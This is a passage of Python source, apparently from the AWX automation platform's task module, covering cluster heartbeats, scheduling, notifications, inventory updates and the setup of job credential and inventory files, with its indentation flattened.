from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in a different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on logging settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
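# Membership is computed in three passes: explicit policy_instance_list
# entries first, then policy_instance_minimum, then policy_instance_percentage.
# Database changes are only applied afterwards if the computed membership
# differs from the groups' current membership.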
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
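# Expand the key list in place with each changed setting's direct dependents
# so their cached values are invalidated as well.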
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
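# Prune dangling (untagged) podman images on this node; these are typically
# layers left behind when execution environment images are updated.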
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# If any other node reports a greater version than ours, then we'll shut down services
for other_inst in instance_list:
if other_inst.version == "":
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisioning is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
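# Recompute next_run for schedules whose window has already passed so that
# stale entries are not considered again on subsequent scheduler runs.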
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
logger.warn(f"Failed to even try to send notifications for job '{uj}' due to job not being in finished state.")
@task(queue=get_local_queuename)
def update_inventory_computed_fields(inventory_id):
"""
Signal handler and wrapper around inventory.update_computed_fields to
prevent unnecessary recursive calls.
"""
i = Inventory.objects.filter(id=inventory_id)
if not i.exists():
logger.error("Update Inventory Computed Fields failed due to missing inventory: " + str(inventory_id))
return
i = i[0]
try:
i.update_computed_fields()
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Exiting duplicate update_inventory_computed_fields task.')
return
raise
def update_smart_memberships_for_inventory(smart_inventory):
current = set(SmartInventoryMembership.objects.filter(inventory=smart_inventory).values_list('host_id', flat=True))
new = set(smart_inventory.hosts.values_list('id', flat=True))
additions = new - current
removals = current - new
if additions or removals:
with transaction.atomic():
if removals:
SmartInventoryMembership.objects.filter(inventory=smart_inventory, host_id__in=removals).delete()
if additions:
add_for_inventory = [SmartInventoryMembership(inventory_id=smart_inventory.id, host_id=host_id) for host_id in additions]
SmartInventoryMembership.objects.bulk_create(add_for_inventory, ignore_conflicts=True)
logger.debug(
'Smart host membership cached for {}, {} additions, {} removals, {} total count.'.format(
smart_inventory.pk, len(additions), len(removals), len(new)
)
)
return True # changed
return False
@task(queue=get_local_queuename)
def update_host_smart_inventory_memberships():
smart_inventories = Inventory.objects.filter(kind='smart', host_filter__isnull=False, pending_deletion=False)
changed_inventories = set([])
for smart_inventory in smart_inventories:
try:
changed = update_smart_memberships_for_inventory(smart_inventory)
if changed:
changed_inventories.add(smart_inventory)
except IntegrityError:
logger.exception('Failed to update smart inventory memberships for {}'.format(smart_inventory.pk))
# Update computed fields for changed inventories outside atomic action
for smart_inventory in changed_inventories:
smart_inventory.update_computed_fields()
@task(queue=get_local_queuename)
def migrate_legacy_event_data(tblname):
#
# NOTE: this function is not actually in use anymore,
# but has been intentionally kept for historical purposes,
# and to serve as an illustration if we ever need to perform
# bulk modification/migration of event data in the future.
#
if 'event' not in tblname:
return
with advisory_lock(f'bigint_migration_{tblname}', wait=False) as acquired:
if acquired is False:
return
chunk = settings.JOB_EVENT_MIGRATION_CHUNK_SIZE
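# Rows are copied from the _old_ table into the new bigint table in
# descending-id chunks and deleted from the old table as they go; once the
# old table is empty (or already gone) it is dropped.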
def _remaining():
try:
cursor.execute(f'SELECT MAX(id) FROM _old_{tblname};')
return cursor.fetchone()[0]
except ProgrammingError:
# the table is gone (migration is unnecessary)
return None
with connection.cursor() as cursor:
total_rows = _remaining()
while total_rows:
with transaction.atomic():
cursor.execute(f'INSERT INTO {tblname} SELECT * FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk} RETURNING id;')
last_insert_pk = cursor.fetchone()
if last_insert_pk is None:
# this means that the SELECT from the old table was
# empty, and there was nothing to insert (so we're done)
break
last_insert_pk = last_insert_pk[0]
cursor.execute(f'DELETE FROM _old_{tblname} WHERE id IN (SELECT id FROM _old_{tblname} ORDER BY id DESC LIMIT {chunk});')
logger.warning(f'migrated int -> bigint rows to {tblname} from _old_{tblname}; # ({last_insert_pk} rows remaining)')
if _remaining() is None:
cursor.execute(f'DROP TABLE IF EXISTS _old_{tblname}')
logger.warning(f'{tblname} primary key migration to bigint has finished')
@task(queue=get_local_queuename)
def delete_inventory(inventory_id, user_id, retries=5):
# Delete inventory as user
if user_id is None:
user = None
else:
try:
user = User.objects.get(id=user_id)
except Exception:
user = None
with ignore_inventory_computed_fields(), ignore_inventory_group_removal(), impersonate(user):
try:
i = Inventory.objects.get(id=inventory_id)
for host in i.hosts.iterator():
host.job_events_as_primary_host.update(host=None)
i.delete()
emit_channel_notification('inventories-status_changed', {'group_name': 'inventories', 'inventory_id': inventory_id, 'status': 'deleted'})
logger.debug('Deleted inventory {} as user {}.'.format(inventory_id, user_id))
except Inventory.DoesNotExist:
logger.exception("Delete Inventory failed due to missing inventory: " + str(inventory_id))
return
except DatabaseError:
logger.exception('Database error deleting inventory {}, but will retry.'.format(inventory_id))
if retries > 0:
time.sleep(10)
delete_inventory(inventory_id, user_id, retries=retries - 1)
def with_path_cleanup(f):
@functools.wraps(f)
def _wrapped(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
finally:
for p in self.cleanup_paths:
try:
if os.path.isdir(p):
shutil.rmtree(p, ignore_errors=True)
elif os.path.exists(p):
os.remove(p)
except OSError:
logger.exception("Failed to remove tmp file: {}".format(p))
self.cleanup_paths = []
return _wrapped
class BaseTask(object):
model = None
event_model = None
abstract = True
def __init__(self):
self.cleanup_paths = []
self.parent_workflow_job_id = None
self.host_map = {}
self.guid = GuidMiddleware.get_guid()
def update_model(self, pk, _attempt=0, **updates):
"""Reload the model instance from the database and update the
given fields.
"""
try:
with transaction.atomic():
# Retrieve the model instance.
instance = self.model.objects.get(pk=pk)
# Update the appropriate fields and save the model
# instance, then return the new instance.
if updates:
update_fields = ['modified']
for field, value in updates.items():
setattr(instance, field, value)
update_fields.append(field)
if field == 'status':
update_fields.append('failed')
instance.save(update_fields=update_fields)
return instance
except DatabaseError as e:
# Log out the error to the debug logger.
logger.debug('Database error updating %s, retrying in 5 ' 'seconds (retry #%d): %s', self.model._meta.object_name, _attempt + 1, e)
# Attempt to retry the update, assuming we haven't already
# tried too many times.
if _attempt < 5:
time.sleep(5)
return self.update_model(pk, _attempt=_attempt + 1, **updates)
else:
logger.error('Failed to update %s after %d retries.', self.model._meta.object_name, _attempt)
def get_path_to(self, *args):
"""
Return absolute path relative to this file.
"""
return os.path.abspath(os.path.join(os.path.dirname(__file__), *args))
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
image = instance.execution_environment.image
params = {
"container_image": image,
"process_isolation": True,
"container_options": ['--user=root'],
}
if instance.execution_environment.credential:
cred = instance.execution_environment.credential
if cred.has_inputs(field_names=('host', 'username', 'password')):
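# Write a podman-style auth.json alongside the private data dir and hand it
# to the container runtime via --authfile so the execution environment image
# can be pulled from an authenticated registry.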
path = os.path.split(private_data_dir)[0]
with open(path + '/auth.json', 'w') as authfile:
os.chmod(authfile.name, stat.S_IRUSR | stat.S_IWUSR)
host = cred.get_input('host')
username = cred.get_input('username')
password = cred.get_input('password')
token = "{}:{}".format(username, password)
auth_data = {'auths': {host: {'auth': b64encode(token.encode('ascii')).decode()}}}
authfile.write(json.dumps(auth_data, indent=4))
params["container_options"].append(f'--authfile={authfile.name}')
else:
raise RuntimeError('Please recheck that your host, username, and password fields are all filled.')
pull = instance.execution_environment.pull
if pull:
params['container_options'].append(f'--pull={pull}')
if settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'] = []
for this_path in settings.AWX_ISOLATION_SHOW_PATHS:
params['container_volume_mounts'].append(f'{this_path}:{this_path}:Z')
return params
def build_private_data(self, instance, private_data_dir):
"""
Return SSH private key data (only if stored in DB as ssh_key_data).
Return structure is a dict of the form documented on RunJob.build_private_data below.
"""
def build_private_data_dir(self, instance):
"""
Create a temporary directory for job-related files.
"""
pdd_wrapper_path = tempfile.mkdtemp(prefix=f'pdd_wrapper_{instance.pk}_', dir=settings.AWX_ISOLATION_BASE_PATH)
os.chmod(pdd_wrapper_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
if settings.AWX_CLEANUP_PATHS:
self.cleanup_paths.append(pdd_wrapper_path)
path = tempfile.mkdtemp(prefix='awx_%s_' % instance.pk, dir=pdd_wrapper_path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
runner_project_folder = os.path.join(path, 'project')
if not os.path.exists(runner_project_folder):
# Ansible Runner requires that this directory exists.
# Specifically, when using process isolation
os.mkdir(runner_project_folder)
return path
def build_private_data_files(self, instance, private_data_dir):
"""
Creates temporary files containing the private data.
Returns a dictionary i.e.,
{
'credentials': {
<awx.main.models.Credential>: '/path/to/decrypted/data',
<awx.main.models.Credential>: '/path/to/decrypted/data',
...
},
'certificates': {
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
<awx.main.models.Credential>: /path/to/signed/ssh/certificate,
...
}
}
"""
private_data = self.build_private_data(instance, private_data_dir)
private_data_files = {'credentials': {}}
if private_data is not None:
for credential, data in private_data.get('credentials', {}).items():
# OpenSSH formatted keys must have a trailing newline to be
# accepted by ssh-add.
if 'OPENSSH PRIVATE KEY' in data and not data.endswith('\n'):
data += '\n'
# For credentials used with ssh-add, write to a named pipe which
# will be read then closed, instead of leaving the SSH key on disk.
if credential and credential.credential_type.namespace in ('ssh', 'scm'):
try:
os.mkdir(os.path.join(private_data_dir, 'env'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(private_data_dir, 'env', 'ssh_key')
ansible_runner.utils.open_fifo_write(path, data.encode())
private_data_files['credentials']['ssh'] = path
# Ansible network modules do not yet support ssh-agent.
# Instead, ssh private key file is explicitly passed via an
# env variable.
else:
handle, path = tempfile.mkstemp(dir=private_data_dir)
f = os.fdopen(handle, 'w')
f.write(data)
f.close()
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
private_data_files['credentials'][credential] = path
for credential, data in private_data.get('certificates', {}).items():
artifact_dir = os.path.join(private_data_dir, 'artifacts', str(self.instance.id))
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir, mode=0o700)
path = os.path.join(artifact_dir, 'ssh_key_data-cert.pub')
with open(path, 'w') as f:
f.write(data)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
return private_data_files
def build_passwords(self, instance, runtime_passwords):
"""
Build a dictionary of passwords for responding to prompts.
"""
return {
'yes': 'yes',
'no': 'no',
'': '',
}
def build_extra_vars_file(self, instance, private_data_dir):
"""
Build ansible yaml file filled with extra vars to be passed via -e @file.yml
"""
def _write_extra_vars_file(self, private_data_dir, vars, safe_dict={}):
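# Unless Jinja in extra vars is fully allowed, the vars are written with the
# sanitizing safe_dump from awx.main.utils.safe_yaml, which only treats the
# entries provided via safe_dict as safe for templating.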
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'extravars')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
if settings.ALLOW_JINJA_IN_EXTRA_VARS == 'always':
f.write(yaml.safe_dump(vars))
else:
f.write(safe_dump(vars, safe_dict))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def add_awx_venv(self, env):
env['VIRTUAL_ENV'] = settings.AWX_VENV_PATH
if 'PATH' in env:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin") + ":" + env['PATH']
else:
env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
ee_cred = self.instance.execution_environment.credential
if ee_cred:
verify_ssl = ee_cred.get_input('verify_ssl')
if not verify_ssl:
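# When TLS verification is disabled on the registry credential, write a
# registries.conf that marks the registry as insecure and point podman at it
# through the environment variables set below.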
pdd_wrapper_path = os.path.split(private_data_dir)[0]
registries_conf_path = os.path.join(pdd_wrapper_path, 'registries.conf')
host = ee_cred.get_input('host')
with open(registries_conf_path, 'w') as registries_conf:
os.chmod(registries_conf.name, stat.S_IRUSR | stat.S_IWUSR)
lines = [
'[[registry]]',
'location = "{}"'.format(host),
'insecure = true',
]
registries_conf.write('\n'.join(lines))
# Podman >= 3.1.0
env['CONTAINERS_REGISTRIES_CONF'] = registries_conf_path
# Podman < 3.1.0
env['REGISTRIES_CONFIG_PATH'] = registries_conf_path
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
os.makedirs(path, mode=0o700)
fn = os.path.join(path, 'hosts')
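# The inventory is written as a small executable script that prints the JSON
# payload, so Ansible treats it as a dynamic inventory source.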
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_cwd(self, instance, private_data_dir):
raise NotImplementedError
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
